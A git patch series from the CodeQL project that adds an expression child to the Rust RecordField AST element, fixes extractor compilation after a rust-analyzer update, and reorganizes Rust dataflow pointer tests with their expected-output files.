lib/codeql/rust/elements/RecordExprFieldList.qll 672c3854cb84090c8a2e9311c43448016dc2614ecbf86dbe404156304674e38f 01ae0ffca0bf640c61120e36fcf2c560555f4aabbd49ddce6f5c1a3561dbfc31 -lib/codeql/rust/elements/RecordField.qll 87d68aa912574596ba09ecb3ab437472635cd76eff49cd5bef00eaabbd264f08 01871ee4dd9bd02acd981fbc109abfa4ee1b303deaa148484476317c4c41c924 +lib/codeql/rust/elements/RecordField.qll 5d23e25985857e37ab7d699a6298d842751da9fb46da341378e17fd7cef66cc8 59272d720dbbad02094f98bf8cf3372974eb449843522b5f510c1f1b01bd2834 lib/codeql/rust/elements/RecordFieldList.qll cebab3fba41221e61cda801070a7f414b62b4fbcf2206e35462c0da35ad75c3f db092d47eea871d61541b9711d7139a99394e0ed83901a8ae60f03dfa8ed722f lib/codeql/rust/elements/RecordPat.qll 3e31af707f72e9af42142e54b7251da8cbc88a9d5f448a4e6b3ca578f92f5680 0b459d751c26a062608ef0b6f3859e9ed1342e129b004ec218694d011955cfbd lib/codeql/rust/elements/RecordPatField.qll 7487461887e82bcf224b02628dfc64457121ab17e731e2dc7aa7e731ab16c02f f2018e55722245eb4273fb067242aaa503c43f91671a55b3a4bb51fe7bc0a03c @@ -574,7 +574,7 @@ lib/codeql/rust/elements/internal/generated/ParamList.qll c808c9d84dd7800573832b lib/codeql/rust/elements/internal/generated/ParenExpr.qll bc0731505bfe88516205ec360582a4222d2681d11342c93e15258590ddee82f2 d4bd6e0c80cf1d63746c88d4bcb3a01d4c75732e5da09e3ebd9437ced227fb60 lib/codeql/rust/elements/internal/generated/ParenPat.qll 4f168ef5d5bb87a903251cc31b2e44a759b099ec69c90af31783fbb15778c940 0e34f94a45a13396fd57d94c245dc64d1adde2ab0e22b56946f7e94c04e297fc lib/codeql/rust/elements/internal/generated/ParenTypeRepr.qll 40ab5c592e7699c621787793743e33988de71ff42ca27599f5ab3ddb70e3f7d8 12c0a6eed2202ee3e892f61da3b3ce77ac3190854cdf3097e8d2be98aa3cb91d -lib/codeql/rust/elements/internal/generated/ParentChild.qll 1df63bfa8268f7db25eab70abedb8d424d892b56e92ceee8c7900cd33b1af07f cfa3d31a89303e60f4ed60ed5ca5fd04973202828aa674205d333f9fa784705f +lib/codeql/rust/elements/internal/generated/ParentChild.qll 2992505ffc3279d58f2d03e89ec0f7d23aedebb3c3baf990bfbda894a6cc10e8 2f6b721e8244b444b47d41c2303fea166debee208544389c4dd9f2be0d62fe43 lib/codeql/rust/elements/internal/generated/ParenthesizedArgList.qll c5fa328ea60d3a3333d7c7bb3480969c1873166c7ac8ebb9d0afad7a8099d1a8 2dbbb6200d96f7db7dea4a55bdeab8d67b14d39a43e0bd54ada019f7e466f163 lib/codeql/rust/elements/internal/generated/Pat.qll 3605ac062be2f294ee73336e9669027b8b655f4ad55660e1eab35266275154ee 7f9400db2884d336dd1d21df2a8093759c2a110be9bf6482ce8e80ae0fd74ed4 lib/codeql/rust/elements/internal/generated/Path.qll 8e47e91aff3f8c60f1ee8cb3887b8e4936c38e4665d052f2c92a939a969aac29 2c28beb89cabd7c7c91a5bc65c874f414cb96bbefde37b25811b61089a8a0053 @@ -589,11 +589,11 @@ lib/codeql/rust/elements/internal/generated/PtrTypeRepr.qll 51d1e9e683fc79dddbff lib/codeql/rust/elements/internal/generated/PureSynthConstructors.qll e5b8e69519012bbaae29dcb82d53f7f7ecce368c0358ec27ef6180b228a0057f e5b8e69519012bbaae29dcb82d53f7f7ecce368c0358ec27ef6180b228a0057f lib/codeql/rust/elements/internal/generated/RangeExpr.qll 23cca03bf43535f33b22a38894f70d669787be4e4f5b8fe5c8f7b964d30e9027 18624cef6c6b679eeace2a98737e472432e0ead354cca02192b4d45330f047c9 lib/codeql/rust/elements/internal/generated/RangePat.qll 80826a6a6868a803aa2372e31c52a03e1811a3f1f2abdb469f91ca0bfdd9ecb6 34ee1e208c1690cba505dff2c588837c0cd91e185e2a87d1fe673191962276a9 -lib/codeql/rust/elements/internal/generated/Raw.qll 17037cbf4b911c74b45453d733726218512c5c8f5e890a6f0e3290fab894a237 5fb11b239f210c30823b8862385f8b9f459ef8b62d47b6b50ba560e4ce2cac7c +lib/codeql/rust/elements/internal/generated/Raw.qll cfbf960b83fc7f659214a48ced60001366410322a116de255678dec9d765d8dd c0d1ee182ccb916dedf33a272fb37ac394e0fac95ef4fadb8a93c7db8d11feb5 lib/codeql/rust/elements/internal/generated/RecordExpr.qll 2131b2cb336caa76170082e69776011bf02576bbfdd34ba68ca84af24209250a 39a2e3ec32352b594c43cc1295e0e8b3f9808173322d3d73cb7d48ef969d5565 lib/codeql/rust/elements/internal/generated/RecordExprField.qll 7e9f8663d3b74ebbc9603b10c9912f082febba6bd73d344b100bbd3edf837802 fbe6b578e7fd5d5a6f21bbb8c388957ab7210a6a249ec71510a50fb35b319ea1 lib/codeql/rust/elements/internal/generated/RecordExprFieldList.qll 179a97211fe7aa6265085d4d54115cdbc0e1cd7c9b2135591e8f36d6432f13d3 dd44bbbc1e83a1ed3a587afb729d7debf7aeb7b63245de181726af13090e50c0 -lib/codeql/rust/elements/internal/generated/RecordField.qll 6d4b184c85419f9282937ebd1b1d14930a263e8754124f2323953991ca0f0e59 2f8bec227f960ae98fc320a65efdfdc5dc04455cd59697e2621585e5a5f942b8 +lib/codeql/rust/elements/internal/generated/RecordField.qll 7a6fd6a8362ea1671560eeb96abcaf9ae412ec9800fcf9c9fbda1849253912af 0e72e067475c20d72aeae2f10589e3f25806b44ac60b6b7289ba860de98a7c92 lib/codeql/rust/elements/internal/generated/RecordFieldList.qll d7bb2677338cf420b0d6371aeec781aacc2272c73413ea96b7418177ad149fb9 5ef52074b9f4ec31e7422b70efdb2e650d673b2625efdfec18a4e48c30e35cf6 lib/codeql/rust/elements/internal/generated/RecordPat.qll f2ce392fb7e481a139ea527ad32d1c7ba65404a05efc56f5c68ce1e8e1e0a928 9710048cd1e6b26b3054ac95778e47f16cff6424bab9ef0c099c1109ef14741f lib/codeql/rust/elements/internal/generated/RecordPatField.qll 5bf624d22903fb874e6d03541cf453493badd382b6910ce950ad0d34dd580e9a b9ec89b69a58b9c418405efa9b0e6ee7b07616f5696a0858583a339d657b5855 @@ -1029,8 +1029,9 @@ test/extractor-tests/generated/RecordExprFieldList/RecordExprFieldList.ql b6cd65 test/extractor-tests/generated/RecordExprFieldList/RecordExprFieldList_getAttr.ql 15b297e79c1ba8c92cb97148d6aab78ed1fd2c94f0d3a430ead8d541024e81ce 4f0a131011cf32e172f7bd027769e39642fb506d37b3d50b175c6ed5947d3d9c test/extractor-tests/generated/RecordExprFieldList/RecordExprFieldList_getField.ql c55e4775c8880c05944be04bdeb1c9e6bad45b922ba71ac3145acd83ff988e59 14ce98d1e5564e9e27c29110237cf6210d130ea887920b2b1bd34a853b7fcc63 test/extractor-tests/generated/RecordExprFieldList/RecordExprFieldList_getSpread.ql f2dd6b85da1cd8195986aefbe7dc8171db6fbbe5b2612c4cbdd8aba052cb0c6a 2c19cb1510c215ddfa004d40bf30fc0fe0dcbb530c320b297541f1dbcb204143 -test/extractor-tests/generated/RecordField/RecordField.ql b1f14a17b6f2e581c2a1e882a7405351ded14c565375b99a0119fafed93a2b09 b7d74549a4f7556e79fcbdb79748905fb13d13cd01de3d551cb5898b1d0af87a +test/extractor-tests/generated/RecordField/RecordField.ql 8ba8ed51144c69266f8a5644604f560d1569de76e1070d8f22247d07ebc521c8 87d485651f9711e49c576dddd543077c49892b71e45fc65ce5122ded303b49f5 test/extractor-tests/generated/RecordField/RecordField_getAttr.ql aa29d317dee23039a807df530a6f04b0678c4d1d34207a4381be535ff04af478 41c5778d6316eec19192334046ed110aea44a4c45937d5c355a9b71c54aa8e04 +test/extractor-tests/generated/RecordField/RecordField_getExpr.ql 15ab939ede4ed4395ef8db8f6e0a3ac03079a3ae617ce9335fb93ba565b402de 9d853f305baf56ec08b22342adc4deb096d771fa48fd478932cc5187cd66304f test/extractor-tests/generated/RecordField/RecordField_getName.ql 1f5c47d41367bd0115df86f22a70d4621d7cbfb41554daa598da29f549479670 64535303b273f1c2027b6ce89b50816ad3cbbca9bf00b2b8402e36b26e675d97 test/extractor-tests/generated/RecordField/RecordField_getTypeRepr.ql f61cfcd0c682604b882a4ed9c746e6f6087e4798d7aaf9d29579e0e2372406e6 01371887fa82748ef196d2e9d27d26c586efb5b4f82d48967b5494723c54af4d test/extractor-tests/generated/RecordField/RecordField_getVisibility.ql cc45e9bb9418d15cef07a1827358c3f18a8737324c8e6852591a2da70df89360 45557497fc165a212fffda71dedabc8159a4f72323430df732698a18922b366c diff --git a/rust/ql/.gitattributes b/rust/ql/.gitattributes index 4d5b319bc367..05ac0fbbf272 100644 --- a/rust/ql/.gitattributes +++ b/rust/ql/.gitattributes @@ -1033,6 +1033,7 @@ /test/extractor-tests/generated/RecordExprFieldList/RecordExprFieldList_getSpread.ql linguist-generated /test/extractor-tests/generated/RecordField/RecordField.ql linguist-generated /test/extractor-tests/generated/RecordField/RecordField_getAttr.ql linguist-generated +/test/extractor-tests/generated/RecordField/RecordField_getExpr.ql linguist-generated /test/extractor-tests/generated/RecordField/RecordField_getName.ql linguist-generated /test/extractor-tests/generated/RecordField/RecordField_getTypeRepr.ql linguist-generated /test/extractor-tests/generated/RecordField/RecordField_getVisibility.ql linguist-generated diff --git a/rust/ql/lib/codeql/rust/elements/RecordField.qll b/rust/ql/lib/codeql/rust/elements/RecordField.qll index 4a5e749b9050..d19a605dad97 100644 --- a/rust/ql/lib/codeql/rust/elements/RecordField.qll +++ b/rust/ql/lib/codeql/rust/elements/RecordField.qll @@ -6,6 +6,7 @@ private import internal.RecordFieldImpl import codeql.rust.elements.AstNode import codeql.rust.elements.Attr +import codeql.rust.elements.Expr import codeql.rust.elements.Name import codeql.rust.elements.TypeRepr import codeql.rust.elements.Visibility diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll index 54301cd04ceb..ee97d8a4c601 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll @@ -903,12 +903,15 @@ private module Impl { private Element getImmediateChildOfRecordField( RecordField e, int index, string partialPredicateCall ) { - exists(int b, int bAstNode, int n, int nAttr, int nName, int nTypeRepr, int nVisibility | + exists( + int b, int bAstNode, int n, int nAttr, int nExpr, int nName, int nTypeRepr, int nVisibility + | b = 0 and bAstNode = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfAstNode(e, i, _)) | i) and n = bAstNode and nAttr = n + 1 + max(int i | i = -1 or exists(e.getAttr(i)) | i) and - nName = nAttr + 1 and + nExpr = nAttr + 1 and + nName = nExpr + 1 and nTypeRepr = nName + 1 and nVisibility = nTypeRepr + 1 and ( @@ -919,7 +922,9 @@ private module Impl { result = e.getAttr(index - n) and partialPredicateCall = "Attr(" + (index - n).toString() + ")" or - index = nAttr and result = e.getName() and partialPredicateCall = "Name()" + index = nAttr and result = e.getExpr() and partialPredicateCall = "Expr()" + or + index = nExpr and result = e.getName() and partialPredicateCall = "Name()" or index = nName and result = e.getTypeRepr() and partialPredicateCall = "TypeRepr()" or diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll index 4e4abb2ae679..a858c89ce57c 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll @@ -786,6 +786,11 @@ module Raw { */ Attr getAttr(int index) { record_field_attrs(this, index, result) } + /** + * Gets the expression of this record field, if it exists. + */ + Expr getExpr() { record_field_exprs(this, result) } + /** * Gets the name of this record field, if it exists. */ diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordField.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordField.qll index aa840aafdcdf..c60261128a1e 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordField.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordField.qll @@ -8,6 +8,7 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.AstNodeImpl::Impl as AstNodeImpl import codeql.rust.elements.Attr +import codeql.rust.elements.Expr import codeql.rust.elements.Name import codeql.rust.elements.TypeRepr import codeql.rust.elements.Visibility @@ -48,6 +49,19 @@ module Generated { */ final int getNumberOfAttrs() { result = count(int i | exists(this.getAttr(i))) } + /** + * Gets the expression of this record field, if it exists. + */ + Expr getExpr() { + result = + Synth::convertExprFromRaw(Synth::convertRecordFieldToRaw(this).(Raw::RecordField).getExpr()) + } + + /** + * Holds if `getExpr()` exists. + */ + final predicate hasExpr() { exists(this.getExpr()) } + /** * Gets the name of this record field, if it exists. */ diff --git a/rust/ql/lib/rust.dbscheme b/rust/ql/lib/rust.dbscheme index bbe668c56ea9..29a351d42ac6 100644 --- a/rust/ql/lib/rust.dbscheme +++ b/rust/ql/lib/rust.dbscheme @@ -836,6 +836,12 @@ record_field_attrs( int attr: @attr ref ); +#keyset[id] +record_field_exprs( + int id: @record_field ref, + int expr: @expr ref +); + #keyset[id] record_field_names( int id: @record_field ref, diff --git a/rust/ql/test/extractor-tests/generated/RecordField/RecordField.ql b/rust/ql/test/extractor-tests/generated/RecordField/RecordField.ql index 6cb0510df2c1..d338dec4c35b 100644 --- a/rust/ql/test/extractor-tests/generated/RecordField/RecordField.ql +++ b/rust/ql/test/extractor-tests/generated/RecordField/RecordField.ql @@ -2,13 +2,16 @@ import codeql.rust.elements import TestUtils -from RecordField x, int getNumberOfAttrs, string hasName, string hasTypeRepr, string hasVisibility +from + RecordField x, int getNumberOfAttrs, string hasExpr, string hasName, string hasTypeRepr, + string hasVisibility where toBeTested(x) and not x.isUnknown() and getNumberOfAttrs = x.getNumberOfAttrs() and + (if x.hasExpr() then hasExpr = "yes" else hasExpr = "no") and (if x.hasName() then hasName = "yes" else hasName = "no") and (if x.hasTypeRepr() then hasTypeRepr = "yes" else hasTypeRepr = "no") and if x.hasVisibility() then hasVisibility = "yes" else hasVisibility = "no" -select x, "getNumberOfAttrs:", getNumberOfAttrs, "hasName:", hasName, "hasTypeRepr:", hasTypeRepr, - "hasVisibility:", hasVisibility +select x, "getNumberOfAttrs:", getNumberOfAttrs, "hasExpr:", hasExpr, "hasName:", hasName, + "hasTypeRepr:", hasTypeRepr, "hasVisibility:", hasVisibility diff --git a/rust/ql/test/extractor-tests/generated/RecordField/RecordField_getExpr.ql b/rust/ql/test/extractor-tests/generated/RecordField/RecordField_getExpr.ql new file mode 100644 index 000000000000..7519191f6b6a --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/RecordField/RecordField_getExpr.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from RecordField x +where toBeTested(x) and not x.isUnknown() +select x, x.getExpr() diff --git a/rust/schema/ast.py b/rust/schema/ast.py index d987cbb26a6f..6617749258cf 100644 --- a/rust/schema/ast.py +++ b/rust/schema/ast.py @@ -535,6 +535,7 @@ class RecordExprFieldList(AstNode, ): class RecordField(AstNode, ): attrs: list["Attr"] | child + expr: optional["Expr"] | child name: optional["Name"] | child type_repr: optional["TypeRepr"] | child visibility: optional["Visibility"] | child From bfcf9ea606f07259c5c8c6c17d9749e2623395a8 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:37:00 +0100 Subject: [PATCH 033/892] Rust: fix compilation errors after `rust-anlyzer` update --- rust/extractor/src/config.rs | 4 ++-- rust/extractor/src/rust_analyzer.rs | 1 + rust/extractor/src/translate/base.rs | 2 +- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/rust/extractor/src/config.rs b/rust/extractor/src/config.rs index 24fef22cff08..f8094c07a6c9 100644 --- a/rust/extractor/src/config.rs +++ b/rust/extractor/src/config.rs @@ -106,7 +106,7 @@ impl Config { let sysroot_src_input = self.sysroot_src.as_ref().map(|p| join_path_buf(dir, p)); match (sysroot_input, sysroot_src_input) { (None, None) => Sysroot::discover(dir, &self.cargo_extra_env), - (Some(sysroot), None) => Sysroot::discover_sysroot_src_dir(sysroot), + (Some(sysroot), None) => Sysroot::discover_rust_lib_src_dir(sysroot), (None, Some(sysroot_src)) => { Sysroot::discover_with_src_override(dir, &self.cargo_extra_env, sysroot_src) } @@ -130,7 +130,7 @@ impl Config { ( CargoConfig { all_targets: self.cargo_all_targets, - sysroot_src: sysroot.src_root().map(ToOwned::to_owned), + sysroot_src: sysroot.rust_lib_src_root().map(ToOwned::to_owned), rustc_source: self .rustc_src .as_ref() diff --git a/rust/extractor/src/rust_analyzer.rs b/rust/extractor/src/rust_analyzer.rs index f0ca9a223207..ee509c6fae78 100644 --- a/rust/extractor/src/rust_analyzer.rs +++ b/rust/extractor/src/rust_analyzer.rs @@ -297,4 +297,5 @@ pub(crate) fn path_to_file_id(path: &Path, vfs: &Vfs) -> Option { .and_then(|x| AbsPathBuf::try_from(x).ok()) .map(VfsPath::from) .and_then(|x| vfs.file_id(&x)) + .map(|(id, _excluded)| id) } diff --git a/rust/extractor/src/translate/base.rs b/rust/extractor/src/translate/base.rs index 6618feae4c20..2faeb12ea835 100644 --- a/rust/extractor/src/translate/base.rs +++ b/rust/extractor/src/translate/base.rs @@ -417,7 +417,7 @@ impl<'a> Translator<'a> { } } ItemContainer::Module(it) => self.canonical_path_from_hir_module(it), - ItemContainer::ExternBlock() | ItemContainer::Crate(_) => Some("".to_owned()), + ItemContainer::ExternBlock(..) | ItemContainer::Crate(..) => Some("".to_owned()), }?; Some(format!("{prefix}::{name}")) } From d9ecb6255e8fc199a43cf1f9ad1e65aea2bc5b01 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:41:34 +0100 Subject: [PATCH 034/892] Shared: fix clippy warning --- shared/tree-sitter-extractor/src/generator/mod.rs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/shared/tree-sitter-extractor/src/generator/mod.rs b/shared/tree-sitter-extractor/src/generator/mod.rs index ea41f3190e61..d972e9fb128d 100644 --- a/shared/tree-sitter-extractor/src/generator/mod.rs +++ b/shared/tree-sitter-extractor/src/generator/mod.rs @@ -234,7 +234,7 @@ fn add_field_for_column_storage<'a>( /// 1. A vector of dbscheme entries. /// 2. A set of names of the members of the `_ast_node` union. /// 3. A map where the keys are the dbscheme names for token kinds, and the -/// values are their integer representations. +/// values are their integer representations. fn convert_nodes( nodes: &node_types::NodeTypeMap, ) -> (Vec, Set<&str>, Map<&str, usize>) { From 51ae7c6b8ce764f2baa1bae14eaf7cfa9a55fe8e Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Mon, 24 Feb 2025 13:18:00 +0100 Subject: [PATCH 035/892] Rust: Reorganize pointers tests and add additional tests --- .../library-tests/dataflow/global/main.rs | 35 +- .../dataflow/pointers/inline-flow.expected | 321 ++++++++++-------- .../library-tests/dataflow/pointers/main.rs | 289 ++++++++++++---- 3 files changed, 398 insertions(+), 247 deletions(-) diff --git a/rust/ql/test/library-tests/dataflow/global/main.rs b/rust/ql/test/library-tests/dataflow/global/main.rs index 5899733af79b..a9d26e46b073 100644 --- a/rust/ql/test/library-tests/dataflow/global/main.rs +++ b/rust/ql/test/library-tests/dataflow/global/main.rs @@ -64,11 +64,11 @@ struct MyFlag { } impl MyFlag { - fn data_in(&self, n: i64) { + fn data_in(self, n: i64) { sink(n); // $ hasValueFlow=1 hasValueFlow=8 } - fn get_data(&self) -> i64 { + fn get_data(self) -> i64 { if self.flag { 0 } else { @@ -76,7 +76,7 @@ impl MyFlag { } } - fn data_through(&self, n: i64) -> i64 { + fn data_through(self, n: i64) -> i64 { if self.flag { 0 } else { @@ -107,13 +107,13 @@ fn data_through_method() { fn data_in_to_method_called_as_function() { let mn = MyFlag { flag: true }; let a = source(8); - MyFlag::data_in(&mn, a); + MyFlag::data_in(mn, a); } fn data_through_method_called_as_function() { let mn = MyFlag { flag: true }; let a = source(12); - let b = MyFlag::data_through(&mn, a); + let b = MyFlag::data_through(mn, a); sink(b); // $ hasValueFlow=12 } @@ -223,29 +223,6 @@ fn test_async_await() { futures::executor::block_on(test_async_await_async_part()); } -// Flow out of mutable parameters. - -fn set_int(n: &mut i64, c: i64) { - *n = c; -} - -fn mutates_argument_1() { - // Passing an already borrowed value to a function and then reading from the same borrow. - let mut n = 0; - let m = &mut n; - sink(*m); - set_int(m, source(37)); - sink(*m); // $ hasValueFlow=37 -} - -fn mutates_argument_2() { - // Borrowing at the call and then reading from the unborrowed variable. - let mut n = 0; - sink(n); - set_int(&mut n, source(88)); - sink(n); // $ MISSING: hasValueFlow=88 -} - fn main() { data_out_of_call(); data_in_to_call(); @@ -258,6 +235,4 @@ fn main() { test_operator_overloading(); test_async_await(); - mutates_argument_1(); - mutates_argument_2(); } diff --git a/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected b/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected index 66d5c1ad666a..97d5a62618db 100644 --- a/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected @@ -1,154 +1,179 @@ models edges -| main.rs:13:9:13:9 | a | main.rs:14:14:14:14 | a | provenance | | -| main.rs:13:13:13:22 | source(...) | main.rs:13:9:13:9 | a | provenance | | -| main.rs:14:9:14:9 | b [&ref] | main.rs:15:14:15:14 | b [&ref] | provenance | | -| main.rs:14:13:14:14 | &a [&ref] | main.rs:14:9:14:9 | b [&ref] | provenance | | -| main.rs:14:14:14:14 | a | main.rs:14:13:14:14 | &a [&ref] | provenance | | -| main.rs:15:9:15:9 | c | main.rs:16:10:16:10 | c | provenance | | -| main.rs:15:13:15:14 | * ... | main.rs:15:9:15:9 | c | provenance | | -| main.rs:15:14:15:14 | b [&ref] | main.rs:15:13:15:14 | * ... | provenance | | -| main.rs:31:6:31:6 | [post] b [&ref] | main.rs:32:11:32:11 | b [&ref] | provenance | | -| main.rs:31:10:31:19 | source(...) | main.rs:31:6:31:6 | [post] b [&ref] | provenance | | -| main.rs:32:11:32:11 | b [&ref] | main.rs:32:10:32:11 | * ... | provenance | | -| main.rs:37:25:37:26 | &... [&ref] | main.rs:37:26:37:26 | n | provenance | | -| main.rs:37:25:37:32 | ...: ... [&ref] | main.rs:37:25:37:26 | &... [&ref] | provenance | | -| main.rs:37:26:37:26 | n | main.rs:38:10:38:10 | n | provenance | | -| main.rs:42:9:42:11 | val | main.rs:43:27:43:29 | val | provenance | | -| main.rs:42:15:42:24 | source(...) | main.rs:42:9:42:11 | val | provenance | | -| main.rs:43:26:43:29 | &val [&ref] | main.rs:37:25:37:32 | ...: ... [&ref] | provenance | | -| main.rs:43:27:43:29 | val | main.rs:43:26:43:29 | &val [&ref] | provenance | | -| main.rs:50:13:50:13 | a | main.rs:51:13:51:17 | ref p | provenance | | -| main.rs:50:17:50:26 | source(...) | main.rs:50:13:50:13 | a | provenance | | -| main.rs:51:13:51:17 | ref p | main.rs:51:17:51:17 | p [&ref] | provenance | | -| main.rs:51:17:51:17 | p [&ref] | main.rs:52:15:52:15 | p [&ref] | provenance | | -| main.rs:52:15:52:15 | p [&ref] | main.rs:52:14:52:15 | * ... | provenance | | -| main.rs:56:13:56:21 | ref mut a | main.rs:56:21:56:21 | a [&ref] | provenance | | -| main.rs:56:21:56:21 | a [&ref] | main.rs:57:15:57:15 | a [&ref] | provenance | | -| main.rs:56:25:56:34 | source(...) | main.rs:56:13:56:21 | ref mut a | provenance | | -| main.rs:57:15:57:15 | a [&ref] | main.rs:57:14:57:15 | * ... | provenance | | -| main.rs:63:13:63:13 | a [Some] | main.rs:64:23:64:23 | a [Some] | provenance | | -| main.rs:63:17:63:32 | Some(...) [Some] | main.rs:63:13:63:13 | a [Some] | provenance | | -| main.rs:63:22:63:31 | source(...) | main.rs:63:17:63:32 | Some(...) [Some] | provenance | | -| main.rs:64:23:64:23 | a [Some] | main.rs:65:13:65:23 | Some(...) [Some] | provenance | | -| main.rs:65:13:65:23 | Some(...) [Some] | main.rs:65:18:65:22 | ref p | provenance | | -| main.rs:65:18:65:22 | ref p | main.rs:65:22:65:22 | p [&ref] | provenance | | -| main.rs:65:22:65:22 | p [&ref] | main.rs:65:34:65:34 | p [&ref] | provenance | | -| main.rs:65:34:65:34 | p [&ref] | main.rs:65:33:65:34 | * ... | provenance | | -| main.rs:76:18:76:21 | SelfParam [MyNumber] | main.rs:77:15:77:18 | self [MyNumber] | provenance | | -| main.rs:77:15:77:18 | self [MyNumber] | main.rs:78:13:78:38 | ...::MyNumber(...) [MyNumber] | provenance | | -| main.rs:78:13:78:38 | ...::MyNumber(...) [MyNumber] | main.rs:78:32:78:37 | number | provenance | | -| main.rs:78:32:78:37 | number | main.rs:76:31:80:5 | { ... } | provenance | | -| main.rs:82:19:82:23 | SelfParam [&ref, MyNumber] | main.rs:83:15:83:18 | self [&ref, MyNumber] | provenance | | -| main.rs:83:15:83:18 | self [&ref, MyNumber] | main.rs:84:13:84:39 | &... [&ref, MyNumber] | provenance | | -| main.rs:84:13:84:39 | &... [&ref, MyNumber] | main.rs:84:14:84:39 | ...::MyNumber(...) [MyNumber] | provenance | | -| main.rs:84:14:84:39 | ...::MyNumber(...) [MyNumber] | main.rs:84:33:84:38 | number | provenance | | -| main.rs:84:33:84:38 | number | main.rs:82:33:86:5 | { ... } | provenance | | -| main.rs:90:9:90:17 | my_number [MyNumber] | main.rs:91:10:91:18 | my_number [MyNumber] | provenance | | -| main.rs:90:21:90:50 | ...::MyNumber(...) [MyNumber] | main.rs:90:9:90:17 | my_number [MyNumber] | provenance | | -| main.rs:90:40:90:49 | source(...) | main.rs:90:21:90:50 | ...::MyNumber(...) [MyNumber] | provenance | | -| main.rs:91:10:91:18 | my_number [MyNumber] | main.rs:76:18:76:21 | SelfParam [MyNumber] | provenance | | -| main.rs:91:10:91:18 | my_number [MyNumber] | main.rs:91:10:91:30 | my_number.to_number(...) | provenance | | -| main.rs:100:9:100:17 | my_number [&ref, MyNumber] | main.rs:101:10:101:18 | my_number [&ref, MyNumber] | provenance | | -| main.rs:100:21:100:51 | &... [&ref, MyNumber] | main.rs:100:9:100:17 | my_number [&ref, MyNumber] | provenance | | -| main.rs:100:22:100:51 | ...::MyNumber(...) [MyNumber] | main.rs:100:21:100:51 | &... [&ref, MyNumber] | provenance | | -| main.rs:100:41:100:50 | source(...) | main.rs:100:22:100:51 | ...::MyNumber(...) [MyNumber] | provenance | | -| main.rs:101:10:101:18 | my_number [&ref, MyNumber] | main.rs:82:19:82:23 | SelfParam [&ref, MyNumber] | provenance | | -| main.rs:101:10:101:18 | my_number [&ref, MyNumber] | main.rs:101:10:101:31 | my_number.get_number(...) | provenance | | -| main.rs:105:9:105:9 | a [&ref, tuple.0] | main.rs:108:19:108:19 | a [&ref, tuple.0] | provenance | | -| main.rs:105:13:105:28 | &... [&ref, tuple.0] | main.rs:105:9:105:9 | a [&ref, tuple.0] | provenance | | -| main.rs:105:14:105:28 | TupleExpr [tuple.0] | main.rs:105:13:105:28 | &... [&ref, tuple.0] | provenance | | -| main.rs:105:15:105:24 | source(...) | main.rs:105:14:105:28 | TupleExpr [tuple.0] | provenance | | -| main.rs:108:9:108:9 | b | main.rs:111:10:111:10 | b | provenance | | -| main.rs:108:19:108:19 | a [&ref, tuple.0] | main.rs:109:9:109:15 | &... [&ref, tuple.0] | provenance | | -| main.rs:109:9:109:15 | &... [&ref, tuple.0] | main.rs:109:10:109:15 | TuplePat [tuple.0] | provenance | | -| main.rs:109:10:109:15 | TuplePat [tuple.0] | main.rs:109:11:109:11 | n | provenance | | -| main.rs:109:11:109:11 | n | main.rs:108:9:108:9 | b | provenance | | +| main.rs:17:13:17:13 | a | main.rs:18:18:18:18 | a | provenance | | +| main.rs:17:17:17:26 | source(...) | main.rs:17:13:17:13 | a | provenance | | +| main.rs:18:13:18:13 | b [&ref] | main.rs:19:18:19:18 | b [&ref] | provenance | | +| main.rs:18:17:18:18 | &a [&ref] | main.rs:18:13:18:13 | b [&ref] | provenance | | +| main.rs:18:18:18:18 | a | main.rs:18:17:18:18 | &a [&ref] | provenance | | +| main.rs:19:13:19:13 | c | main.rs:20:14:20:14 | c | provenance | | +| main.rs:19:17:19:18 | * ... | main.rs:19:13:19:13 | c | provenance | | +| main.rs:19:18:19:18 | b [&ref] | main.rs:19:17:19:18 | * ... | provenance | | +| main.rs:23:29:23:30 | &... [&ref] | main.rs:23:30:23:30 | n | provenance | | +| main.rs:23:29:23:36 | ...: ... [&ref] | main.rs:23:29:23:30 | &... [&ref] | provenance | | +| main.rs:23:30:23:30 | n | main.rs:24:14:24:14 | n | provenance | | +| main.rs:28:13:28:15 | val | main.rs:29:31:29:33 | val | provenance | | +| main.rs:28:19:28:28 | source(...) | main.rs:28:13:28:15 | val | provenance | | +| main.rs:29:30:29:33 | &val [&ref] | main.rs:23:29:23:36 | ...: ... [&ref] | provenance | | +| main.rs:29:31:29:33 | val | main.rs:29:30:29:33 | &val [&ref] | provenance | | +| main.rs:33:13:33:13 | a [&ref, tuple.0] | main.rs:36:23:36:23 | a [&ref, tuple.0] | provenance | | +| main.rs:33:17:33:32 | &... [&ref, tuple.0] | main.rs:33:13:33:13 | a [&ref, tuple.0] | provenance | | +| main.rs:33:18:33:32 | TupleExpr [tuple.0] | main.rs:33:17:33:32 | &... [&ref, tuple.0] | provenance | | +| main.rs:33:19:33:28 | source(...) | main.rs:33:18:33:32 | TupleExpr [tuple.0] | 